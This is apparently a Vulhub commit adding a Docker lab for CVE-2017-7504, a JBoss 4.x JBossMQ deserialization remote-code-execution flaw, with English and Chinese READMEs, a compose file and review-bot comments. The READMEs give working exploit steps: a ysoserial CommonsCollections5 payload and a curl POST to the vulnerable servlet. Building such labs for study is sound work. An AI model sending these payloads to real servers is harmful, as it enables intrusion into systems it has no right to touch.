first commit
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Vulhub Docker Image CI / images-test (push) Has been cancelled
BIN
jboss/CVE-2017-7504/1.png
Normal file
Binary file not shown.
38
jboss/CVE-2017-7504/README.md
Normal file
@@ -0,0 +1,38 @@
# JBoss 4.x JBossMQ JMS Deserialization Remote Code Execution (CVE-2017-7504)
[中文版本(Chinese version)](README.zh-cn.md)
Red Hat JBoss Application Server is a JavaEE-based open source application server. In JBoss AS 4.x and earlier versions, there is a deserialization vulnerability in the HTTPServerILServlet.java file of the JMS over HTTP Invocation Layer in JBossMQ implementation. Remote attackers can exploit this vulnerability to execute arbitrary code by using specially crafted serialized data.
References:
- https://github.com/joaomatosf/JavaDeserH2HC
- https://www.youtube.com/watch?v=jVMr4eeJ2Po
## Environment Setup
Execute the following command to start JBoss AS 4.0.5:
```
docker compose up -d
```
After the environment is started, the target will be available at `http://your-ip:8080`.
## Vulnerability Reproduce
This vulnerability exists in the `/jbossmq-httpil/HTTPServerILServlet` request. We can use the CommonsCollections5 exploitation chain from ysoserial to reproduce it. Generate the payload:
```
java -jar ysoserial-master-30099844c6-1.jar CommonsCollections5 "touch /tmp/success" > 1.ser
```
Send the content of 1.ser file as POST Body:
```
curl http://your-ip:8080/jbossmq-httpil/HTTPServerILServlet --data-binary @1.ser
```

Execute `docker compose exec jboss bash` to enter the container, and you can see that `/tmp/success` has been successfully created.
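Review bot: the closing paragraph tells the reader what to expect but not how to check it; after `docker compose exec jboss bash`, spell out the verification (e.g. `ls -l /tmp/success`) so the reproduction ends with a concrete command rather than a description. Two smaller points in the same hunk: the three code fences carry no language tag (```bash would give the markdown lint and the renderer something to work with), and "This vulnerability exists in the `/jbossmq-httpil/HTTPServerILServlet` request" would read more precisely as "is triggered by a POST to `/jbossmq-httpil/HTTPServerILServlet`".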
36
jboss/CVE-2017-7504/README.zh-cn.md
Normal file
@@ -0,0 +1,36 @@
# JBoss 4.x JBossMQ JMS 反序列化漏洞(CVE-2017-7504)
Red Hat JBoss Application Server 是一款基于JavaEE的开源应用服务器。JBoss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。
参考:
- https://github.com/joaomatosf/JavaDeserH2HC
- https://www.youtube.com/watch?v=jVMr4eeJ2Po
## 漏洞环境
执行如下命令启动JBoss AS 4.0.5:
```
docker compose up -d
```
环境启动后,目标为`http://your-ip:8080`。
## 漏洞复现
该漏洞出现在`/jbossmq-httpil/HTTPServerILServlet`请求中,我们借助ysoserial的eCommonsCollections5利用链来复现。生成Payload:
```
java -jar ysoserial-master-30099844c6-1.jar CommonsCollections5 "touch /tmp/success" > 1.ser
```
我们将1.ser文件内容作为POST Body发送:
```
curl http://your-ip:8080/jbossmq-httpil/HTTPServerILServlet --data-binary @1.ser
```

执行`docker compose exec jboss bash`进入容器,可见`/tmp/success`已成功创建。
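Review bot: typo in the reproduction paragraph of this hunk: "ysoserial的eCommonsCollections5利用链" has a stray "e" in front of the gadget name and should read "CommonsCollections5", matching the argument in the ysoserial command right below it. The title also drops the "Remote Code Execution" wording of the English README; adding the equivalent phrase to the Chinese title would keep the two files in step.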
5
jboss/CVE-2017-7504/docker-compose.yml
Normal file
@@ -0,0 +1,5 @@
services:
jboss:
image: vulhub/jboss:as-4.0.5
ports:
- "8080:8080"
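Review bot: `"8080:8080"` publishes the port on every host interface, and this container is an RCE target by design (the README's curl command needs no credentials), so anyone who can reach the host's network can run code inside it. Binding the port to loopback (`"127.0.0.1:8080:8080"`), or stating in the README that the lab must only be started on an isolated network, would limit that exposure.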